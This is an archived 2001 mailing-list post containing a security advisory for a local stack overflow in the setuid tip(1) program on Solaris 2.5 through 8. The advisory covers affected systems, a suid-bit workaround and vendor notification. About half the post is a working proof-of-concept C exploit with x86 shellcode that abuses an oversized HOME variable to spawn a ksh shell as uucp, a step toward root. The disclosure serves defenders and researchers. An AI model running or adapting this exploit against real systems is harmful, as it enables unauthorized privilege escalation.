OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Pablo Sor (psorAFIP.GOV.AR)
Date: Tue Mar 27 2001 - 05:54:42 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Vulnerability in Solaris tip(1)

    Date Published: March 27, 2001

    Advisory ID: N/A

    Bugtraq ID: N/A

    CVE CAN: Non currently assigned.

    Title: Solaris tip(1) Buffer Overflow Vulnerability

    Class: Boundary Error Condition

    Remotely Exploitable: No

    Locally Exploitable: Yes

    Vulnerability Description:

    The tip program is installed setuid uucp by default in Solaris,
    it contains a vulnerability in handling data from enviroment variables,
    if this variable exceeds predefined lenght an exploitable stack overflow

    can occur.
    Through exploiting this vulnerability an attacker can gain effective
    uid uucp and through that root.

    Vulnerable Packages/Systems:

    Solaris 8
    Solaris 7
    Solaris 2.6
    Solaris 2.5.1
    Solaris 2.5

    Quick Fix:

    Clear the suid bit of /usr/bin/tip program.

    Solution/Vendor :

    Sun Microsystems was notified on March 16, 2001. Patches are excepted
    shortly.

    Vendor notified on:

    March 16, 2001

    Credits:

    This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.

    Special thanks to Dave Ahmed from SecurityFocus.

    This advisory was drafted with the help of the SecurityFocus.com
    Vulnerability
    Help Team. For more information or assistance drafting advisories please
    mail
    vulnhelpsecurityfocus.com.

    Technical Description - Exploit/Concept Code:

    #include <fcntl.h>

    /*
       /usr/bin/tip overflow proof of conecpt.

       Pablo Sor, Buenos Aires, Argentina 03/2001
       psorafip.gov.ar

       works against x86 solaris 7,8

       default offset should work.

    */

    long get_esp() { __asm__("movl %esp,%eax"); }

    int main(int ac, char **av)
    {

    char shell[]=
    "\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05"
    "\xe8\xf9\xff\xff\xff\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2"
    "\x50\xb0\x8d\xe8\xe0\xff\xff\xff\x6a\x05\x90\xb0\x17\xe8\xd6\xff\xff\xff"

    "\xeb\x1f\x5e\x8d\x1e\x89\x5e\x0b\x29\xc0\x88\x46\x19\x89\x46\x14"
    "\x89\x46\x0f\x89\x46\x07\xb0\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18"
    "\xe8\xdc\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78\x01\x01\x01\x01\x02\x02"

    "\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

      unsigned long magic = get_esp() + 0x50; /* default offset */
      unsigned char buf[600];

      symlink("/bin/ksh","/tmp/xx");
      memset(buf,0x90,600);
      buf[599]=0;
      memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
      memcpy(buf,"HOME=",5);
      memcpy(buf+265,&magic,4);
      putenv(buf);

      system("/usr/bin/tip 5");
      unlink("/tmp/xx");
    }